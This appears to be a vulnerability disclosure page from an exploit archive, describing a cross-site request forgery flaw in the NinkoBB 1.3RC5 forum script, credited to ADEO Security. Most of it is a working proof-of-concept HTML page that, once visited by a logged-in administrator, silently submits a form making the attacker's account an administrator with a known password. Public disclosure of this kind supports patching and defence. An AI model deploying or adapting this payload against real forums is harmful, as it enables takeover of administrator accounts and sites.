4e7ab00187
204 changes to exploits/shellcodes Charity Management System CMS 1.0 - Multiple Vulnerabilities
45 lines
No EOL
1.6 KiB
Text
45 lines
No EOL
1.6 KiB
Text
# Title: NinkoBB CSRF Vulnerability
|
|
# Author: ADEO Security
|
|
# Published: 30/06/2010
|
|
# Version: 1.3RC5 (Possible all versions)
|
|
# Vendor: http://ninkobb.com
|
|
# Download: http://ninkobb.com/releases/?NinkoBB-1.3RC5.zip
|
|
|
|
# Description: "NinkoBB is an open source forum script written in the
|
|
PHP language and uses a MySQL Database.
|
|
NinkoBB is designed to be as simple as possible and provide you with
|
|
the key features that you need, all the while keeping the space used
|
|
on your server to a minimum.
|
|
Built to be simple, small, and easy to use with a user friendly
|
|
install for a quick setup, painless upgrade system, and easy to use
|
|
admin panel for managing your forum. Also includes support for
|
|
categories, plugins, languages, and themes."
|
|
|
|
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
|
|
- Mail: security[AT]adeo.com.tr
|
|
- Web: http://security.adeo.com.tr
|
|
|
|
# Vulnerability:
|
|
If administrator of the board browse PoC attacker can gain privilege
|
|
access. See #PoC section.
|
|
|
|
# PoC:
|
|
<html>
|
|
<body>
|
|
<form method="post" action="http://ninkobb.test/admin.php?a=users&edit=1">
|
|
<input type="hidden" name="username" value="attackers_uname">
|
|
<input type="hidden" name="admin" value="true">
|
|
<input type="hidden" name="email" value="attackers_mail@mail.com">
|
|
<input type="hidden" name="npassword" value="adeopass">
|
|
<input type="hidden" name="npassworda" value="adeopass">
|
|
<input type="hidden" name="edit" value="submit">
|
|
</form>
|
|
<script>document.forms[0].submit()</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
--
|
|
Canberk BOLAT
|
|
i'm currently intern @ ADEO Security
|
|
http://twitter.com/cnbrkbolat |